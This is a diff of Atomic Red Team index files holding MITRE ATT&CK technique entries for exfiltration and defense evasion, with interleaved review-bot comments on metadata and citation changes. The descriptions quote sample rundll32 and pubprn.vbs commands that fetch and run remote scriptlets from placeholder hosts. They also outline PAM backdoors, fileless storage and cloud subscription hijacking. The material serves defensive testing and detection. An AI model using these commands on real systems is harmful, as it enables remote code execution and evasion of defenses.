physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -120239,8 +121113,6 @@ exfiltration:
- 'Command: Command Execution'
x_mitre_system_requirements:
- Presence of physical medium or device
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1567.003:
technique:
@@ -120291,7 +121163,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.003
atomic_tests:
- name: Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)
@@ -120367,7 +121238,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.002
atomic_tests:
- name: Exfiltrate data with rclone to cloud Storage - Mega (Windows)
@@ -120454,7 +121324,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:47:46.912Z'
name: Data Transfer Size Limits
description: An adversary may exfiltrate data in fixed size chunks instead of
whole files or limit packet sizes below certain thresholds. This approach
@@ -120477,8 +121347,6 @@ exfiltration:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1030
atomic_tests:
- name: Data Transfer Size Limits
@@ -120553,7 +121421,7 @@ exfiltration:
$file.Close()
T1537:
technique:
- modified: '2024-04-11T15:53:00.577Z'
+ modified: '2024-10-15T16:08:25.344Z'
name: Transfer Data to Cloud Account
description: "Adversaries may exfiltrate data by transferring the data, including
through sharing/syncing and creating backups of cloud environments, to another
@@ -120594,9 +121462,8 @@ exfiltration:
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Modification'
- 'Snapshot: Snapshot Creation'
@@ -120644,7 +121511,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1052:
technique:
@@ -120666,7 +121532,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1052
external_id: T1052
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.702Z'
name: Exfiltration Over Physical Medium
description: Adversaries may attempt to exfiltrate data via a physical medium,
such as a removable drive. In certain circumstances, such as an air-gapped
@@ -120690,12 +121556,10 @@ exfiltration:
x_mitre_system_requirements:
- Presence of physical medium or device
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1048.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:39:25.476Z'
name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
Non-C2 Protocol'
description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -120759,7 +121623,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048.003
atomic_tests:
- name: Exfiltration Over Alternative Protocol - HTTP
diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml
index ff933281bb..ce1d9381ff 100644
--- a/atomics/Indexes/linux-index.yaml
+++ b/atomics/Indexes/linux-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-04T15:05:25.388Z'
name: Fileless Storage
description: "Adversaries may store data in \"fileless\" formats to conceal
malicious activity from defenses. Fileless storage can be broadly defined
as any format other than a file. Common examples of non-volatile fileless
- storage include the Windows Registry, event logs, or WMI repository.(Citation:
- Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
- in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+ storage in Windows systems include the Windows Registry, event logs, or WMI
+ repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+ Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+ and `/var/lock` may also be considered fileless storage, as files written
+ to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+ Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+ 2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+ behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
data storage may remain undetected by anti-virus and other endpoint security
- tools that can only access specific file formats from disk storage.\n\nAdversaries
+ tools that can only access specific file formats from disk storage. Leveraging
+ fileless storage may also allow adversaries to bypass the protections offered
+ by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
may use fileless storage to conceal various types of stored data, including
payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
and collected data not yet exfiltrated from the victim (e.g., [Local Data
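Review bot: the new Linux sentence in the description says files under `/var/run` and `/var/lock` are "mapped directly to RAM"; that holds only where those paths are tmpfs mounts (on current systemd distributions `/var/run` is a symlink to `/run`, which is tmpfs), so a detection derived from this text should key on the mount type, not the path. The read-only-filesystem bypass claimed in the same paragraph is also blunted by mounting `/dev/shm` and `/run` with `noexec`, which stops direct execution from them though not data storage; that is the mitigation a reader will look for and the description omits it. Both are upstream ATT&CK wording, so the correction belongs in a follow-up to MITRE rather than in this generated file.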
@@ -200,6 +204,7 @@ defense-evasion:
- Mark Wee
- Simona David
- Xavier Rousseau
+ - Vito Alfano, Group-IB
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.0'
+ - Linux
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'WMI: WMI Creation'
+ - 'Process: Process Creation'
type: attack-pattern
id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
created: '2023-03-23T19:55:25.546Z'
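Review bot: with `Linux` added to `x_mitre_platforms` and the version bumped to 2.0, T1027.011 now belongs in `linux-index.yaml` on its own merits, yet it still carries `atomic_tests: []` further down. A follow-up atomic that writes a payload to `/dev/shm`, executes it and removes it in cleanup would give the newly added `Process: Process Creation` data source something to exercise; at minimum, open an issue so the empty entry is tracked rather than forgotten.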
@@ -220,6 +227,14 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/011
external_id: T1027.011
+ - source_name: Aquasec Muhstik Malware 2024
+ description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+ Queuing Services Applications. Retrieved September 24, 2024."
+ url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+ - source_name: Elastic Binary Executed from Shared Memory Directory
+ description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+ Retrieved September 24, 2024.
+ url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
- source_name: SecureList Fileless
description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
Retrieved March 23, 2023.
@@ -228,15 +243,22 @@ defense-evasion:
description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
23, 2023.
url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+ - source_name: Sysdig Fileless Malware 23022
+ description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+ September 24, 2024.
+ url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+ - source_name: Akami Frog4Shell 2024
+ description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+ Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+ url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.011:
technique:
- modified: '2023-08-14T15:35:28.965Z'
+ modified: '2024-10-14T13:14:43.083Z'
name: 'Signed Binary Proxy Execution: Rundll32'
description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
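Review bot: two of the new `source_name` keys are misspelled: `Akami Frog4Shell 2024` (the URL is akamai.com) and `Sysdig Fileless Malware 23022` (the cited article is dated 2022). They are upstream ATT&CK keys and must match the `(Citation: ...)` tokens used in the description earlier in this file, so do not correct them in one place only; either keep both ends exactly as upstream has them or fix key and citation in the same change.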
@@ -247,10 +269,10 @@ defense-evasion:
also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL
and Control_RunDLLAsUser
. Double-clicking a .cpl file also causes
- rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
- be used to execute scripts such as JavaScript. This can be done using a syntax
- similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
- \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
+ rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+ can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+ scripts such as JavaScript. This can be done using a syntax similar to this:
+ rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
\ This behavior has been seen used by malware such as Poweliks. (Citation:
This is Security Command Line Confusion)\n\nAdversaries may also attempt to
obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -286,7 +308,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
@@ -316,7 +338,7 @@ defense-evasion:
- source_name: This is Security Command Line Confusion
description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
Retrieved March 5, 2018.
- url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+ url: https://www.stormshield.com/news/poweliks-command-line-confusion/
- source_name: Github NoRunDll
description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
2021.
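Review bot: the citation URL moves from `thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/` to `www.stormshield.com/news/poweliks-command-line-confusion/` while the entry's `Retrieved March 5, 2018.` text is unchanged, so the retrieval date now predates the URL it is attached to. Confirm the new URL serves the same 2014 Poweliks article; if the change comes from upstream leave it, otherwise update the retrieved date together with the URL.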
@@ -327,9 +349,8 @@ defense-evasion:
url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.011
atomic_tests: []
T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
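Review bot: the T1556.003 block is a key reorder, not a deletion, so this hunk reads far worse than it is: `x_mitre_platforms`, `x_mitre_contributors`, `external_references`, `id`, `created` and the rest are all re-added in a different order in the hunk that follows, with the reference list itself reordered (PAM Creds now precedes Red Hat PAM). Review the pair field by field rather than line by line; the only change of substance is in the following hunk, not here.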
@@ -476,20 +458,57 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests:
- name: Malicious PAM rule
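Review bot: `x_mitre_permissions_required: - root` is deleted from T1556.003 with no replacement, while T1536 further down in this file keeps `x_mitre_permissions_required: - User` through its own spec-version cleanup, so the two objects end up treating the same legacy key differently. If the 3.2.0 bump means upstream dropped the field for this technique, say so in the commit message; otherwise restore it. The new `revoked: false` and `x_mitre_deprecated: false` keys also show a generator-side change is in play, not only new upstream data, which is worth a line in the description of this change.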
@@ -640,7 +659,7 @@ defense-evasion:
url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
description: Google. (2019, October 7). Restoring and deleting persistent
disk snapshots. Retrieved October 8, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-08T10:33:02.128Z'
name: Revert Cloud Instance
description: |-
An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -667,8 +686,6 @@ defense-evasion:
- 'Instance: Instance Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.012:
technique:
@@ -710,7 +727,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.002:
technique:
@@ -788,7 +804,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.002
atomic_tests:
- name: chmod - Change file or folder mode (numeric mode)
@@ -1177,7 +1192,7 @@ defense-evasion:
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script:
parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct
. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs
has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://
, vice the script:
moniker which could be used to reference remote code via HTTP(S).
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:55:35.817Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Script Proxy Execution: Pubprn'
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -1196,7 +1211,6 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216.001
atomic_tests: []
T1574.007:
@@ -1286,7 +1300,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1006:
technique:
@@ -1344,12 +1357,87 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1006
atomic_tests: []
+ T1666:
+ technique:
+ modified: '2024-09-25T16:15:41.224Z'
+ name: Modify Cloud Resource Hierarchy
+ description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+ (IaaS) environments in order to evade defenses. \n\nIaaS environments often
+ group resources into a hierarchy, enabling improved resource management and
+ application of policies to relevant groups. Hierarchical structures differ
+ among cloud providers. For example, in AWS environments, multiple accounts
+ can be grouped under a single organization, while in Azure environments, multiple
+ subscriptions can be grouped under a single management group.(Citation: AWS
+ Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+ delete, or otherwise modify resource groups within an IaaS hierarchy. For
+ example, in Azure environments, an adversary who has gained access to a Global
+ Administrator account may create new subscriptions in which to deploy resources.
+ They may also engage in subscription hijacking by transferring an existing
+ pay-as-you-go subscription from a victim tenant to an adversary-controlled
+ tenant. This will allow the adversary to use the victim’s compute resources
+ without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+ 2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+ adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+ API, causing the account to be severed from the AWS Organization to which
+ it was tied and removing any Service Control Policies, guardrails, or restrictions
+ imposed upon it by its former Organization. Alternatively, adversaries may
+ call the `CreateAccount` API in order to create a new account within an AWS
+ Organization. This account will use the same payment methods registered to
+ the payment account but may not be subject to existing detections or Service
+ Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ type: attack-pattern
+ id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+ created: '2024-09-25T14:16:19.234Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1666
+ external_id: T1666
+ - source_name: AWS Organizations
+ description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+ Retrieved September 25, 2024.
+ url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Microsoft Subscription Hijacking 2022
+ description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+ using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+ url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+ - source_name: Microsoft Azure Resources
+ description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+ effectively. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+ - source_name: Microsoft Peach Sandstorm 2023
+ description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+ password spray campaigns enable intelligence collection at high-value targets.
+ Retrieved September 18, 2023.
+ url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.008:
technique:
- modified: '2023-10-16T16:41:53.957Z'
+ modified: '2024-10-15T15:56:27.592Z'
name: 'Hide Artifacts: Email Hiding Rules'
description: |-
Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule
or Set-InboxRule
[PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
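Review bot: the new `T1666` block ends with `x_mitre_modified_by_ref` followed directly by `atomic_tests: []` and has no `identifier:` line, whereas the neighbouring `T1006` entry carries `identifier: T1006` in that position; if the identifier is what the per-technique index generation keys on, the new technique will be skipped. Also note that `x_mitre_detection` is the empty string while the only data source is `'Cloud Service: Cloud Service Modification'`, so there is currently no detection guidance attached to a defense-evasion technique that, per its own description, is intended to evade logging (subscription transfer, `LeaveOrganization`); that is inherited from upstream, but it is worth flagging for anyone adding an atomic test later.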
@@ -1375,11 +1463,10 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
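Review bot: this hunk replaces the `Office 365` and `Google Workspace` platform entries with a single `Office Suite` value (and the `T1484.002` hunk later in the file does the same for `Azure AD` and `SaaS`, replacing them with `Identity Provider`). Any per-platform index that is keyed on the old platform names will stop listing this technique once it is regenerated, so the platform-specific index files should be regenerated in the same change and the rename mentioned in the PR description; otherwise the old and new platform names will coexist and searches for either will be incomplete.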
@@ -1424,12 +1511,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.008
atomic_tests: []
T1027.013:
technique:
- modified: '2024-04-19T04:03:07.164Z'
+ modified: '2024-10-15T16:32:45.108Z'
name: Encrypted/Encoded File
description: "Adversaries may encrypt or encode files to obfuscate strings,
bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1500,11 +1586,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:50.568Z'
name: Rootkit
description: "Adversaries may use rootkits to hide the presence of programs,
files, network connections, services, drivers, and other system components.
@@ -1572,7 +1657,6 @@ defense-evasion:
